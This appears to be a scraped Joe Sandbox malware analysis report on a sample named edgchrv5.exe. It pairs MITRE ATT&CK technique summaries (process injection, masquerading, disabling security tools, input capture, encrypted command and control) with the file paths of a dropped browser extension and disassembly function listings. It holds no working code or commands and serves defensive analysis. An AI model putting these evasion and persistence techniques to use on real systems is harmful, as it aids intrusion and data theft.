Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Internet browser extensions to establish persistence access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.
Tactics:	Persistence
Data Sources:	Browser extensions, File monitoring, Process monitoring, Process use of network, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries can take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify behavior, and intercept information as part of various man in the browser techniques.
Tactics:	Collection
Data Sources:	API monitoring, Authentication logs, Packet capture, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report edgchrv5.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\ServiceApp\apps-helper\edge.crx

C:\Users\user\AppData\Local\ServiceApp\apps-helper\manifest.json

C:\Users\user\AppData\Local\ServiceApp\apps-helper\service.js

C:\Users\user\AppData\Local\ServiceApp\apps-helper\web.js

Chrome Cache Entry: 127

Chrome Cache Entry: 128

Chrome Cache Entry: 129

Chrome Cache Entry: 130

Chrome Cache Entry: 131

Chrome Cache Entry: 132

Chrome Cache Entry: 133

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Rich Headers

Windows Analysis Report
edgchrv5.exe

Function 01001740 Relevance: 173.9, APIs: 34, Strings: 65, Instructions: 685
COMMON

Function 01001F50 Relevance: 82.8, APIs: 28, Strings: 19, Instructions: 506
COMMON

Function 0100180C Relevance: 70.4, APIs: 23, Strings: 17, Instructions: 350
registryCOMMON

Function 01001460 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 141
COMMON

Function 010015BC Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 128
fileCOMMON

Function 01001330 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 101
processCOMMON

Function 01002CED Relevance: 9.1, APIs: 6, Instructions: 71
threadCOMMON

Function 0100175A Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 51
COMMON

Function 01001A1A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 22
sleepCOMMON

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre